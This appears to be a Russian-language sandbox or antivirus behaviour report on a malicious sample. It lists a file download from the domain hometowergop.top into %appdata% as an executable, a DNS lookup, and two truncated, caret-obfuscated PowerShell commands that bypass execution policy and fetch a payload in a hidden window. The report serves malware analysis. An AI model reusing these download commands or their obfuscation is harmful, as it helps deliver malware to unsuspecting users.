Техническая информация
- http://hometowergop.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "pOW^ERSh^E^Ll.exE -eX^EcUT^IOnp^o^lICy b^Ypas^S ^-noPR^oFIlE^ -wI^Nd^oWS^ty^l^e ^Hi^DD^E^n (^NEW-o^BJECt sySTem^.^net^.WEbCli^EN^T).d^OWNL^oAdFil^e(^'http://hometowergop.to...
- DNS ASK ho####wergop.top
- '<SYSTEM32>\cmd.exe' /c "pOW^ERSh^E^Ll.exE -eX^EcUT^IOnp^o^lICy b^Ypas^S ^-noPR^oFIlE^ -wI^Nd^oWS^ty^l^e ^Hi^DD^E^n (^NEW-o^BJECt sySTem^.^net^.WEbCli^EN^T).d^OWNL^oAdFil^e(^'http://hometowergop.to...' (со скрытым окном)